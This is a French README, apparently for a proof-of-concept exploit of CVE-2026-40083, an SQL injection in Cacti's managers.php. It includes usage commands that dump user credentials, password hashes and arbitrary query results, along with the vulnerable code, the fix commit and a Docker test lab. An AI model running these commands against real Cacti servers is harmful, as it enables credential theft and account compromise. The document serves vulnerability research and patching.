Exploit de preuve de concept pour CVE-2026-40083, une injection SQL dans Cacti managers.php permettant aux utilisateurs authentifiés d'extraire des bases de données MySQL, des identifiants utilisateur et des hachages de mots de passe. Comprend un laboratoire Docker pour les tests.
Un exploit proof-of-concept pour CVE-2026-40083, une vulnérabilité d'injection SQL dans le fichier managers.php de Cacti qui permet à tout utilisateur authentifié disposant des permissions SNMP Manager de lire l'intégralité de la base de données MySQL, y compris les identifiants utilisateur et les hachages de mots de passe.
Utilisation :
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
Dans managers.php, l'entrée utilisateur de selected_graphs_array est désérialisée via cacti_unserialize() et directement intégrée dans une requête SQL sans assainissement :
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// No validation - direct implode into SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
Le paramètre selected_graphs_array accepte un tableau sérialisé PHP. Les éléments du tableau sont reliés par des virgules et injectés directement dans la clause IN.
POST /managers.php (action=actions, drp_action=1|2|3)
La vulnérabilité d'injection SQL permet à des utilisateurs authentifiés disposant des permissions SNMP Manager d'exécuter des requêtes arbitraires sur la base de données. Cela permet la lecture de tables contenant les données utilisateur, les paramètres, les identifiants d'équipements et les communautés SNMP, ainsi que l'extraction de hachages bcrypt et de jetons API, ce qui peut entraîner la compromission de comptes. De plus, la faille permet l'exécution de commandes à retardement, pouvant provoquer un déni de service en épuisant les connexions simultanées à la base de données.
7.2 Élevé CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Le commit 52032e760 ajoute array_map('intval', $selected_items) avant l'implosion afin de convertir toutes les valeurs en entiers.
docker-compose up -d --build
Attendez environ 30 secondes pour l'initialisation. Accédez à Cacti sur http://localhost:8088
Identifiants par défaut : admin / admin
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
Cet outil est réservé à des fins éducatives et de recherche. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce programme.
QuimeraX Intelligence est une plateforme avancée d'EASM et de Cyber Threat Intelligence spécialisée dans l'identification de vulnérabilités critiques dans des systèmes complexes. La plateforme surveille, détecte et alerte de manière proactive les clients sur les menaces de sécurité, garantissant transparence et réponse rapide aux risques potentiels. Les clients reçoivent des notifications immédiates et des rapports complets si leurs systèmes sont jugés vulnérables, leur permettant de prendre des mesures de protection. en savoir plus
Hakai Security est une entreprise de cybersécurité fondée par des professionnels de la sécurité, engagée en faveur de l'excellence technique. Nous proposons des solutions de sécurité sur mesure, notamment des tests d'intrusion avancés, des simulations réalistes de Red Team et des pratiques de développement sécurisé pour protéger de manière proactive les actifs de nos clients contre les cybermenaces en constante évolution.
Hacking Club est la plateforme de formation où vous apprenez la cybersécurité grâce à des leçons pratiques, des laboratoires et des défis créés par des experts travaillant dans notre cabinet de conseil en sécurité : directement du champ de bataille à votre formation. Entraînez-vous sur la vulnérabilité présentée dans ce dépôt avec le hacking club ! en savoir plus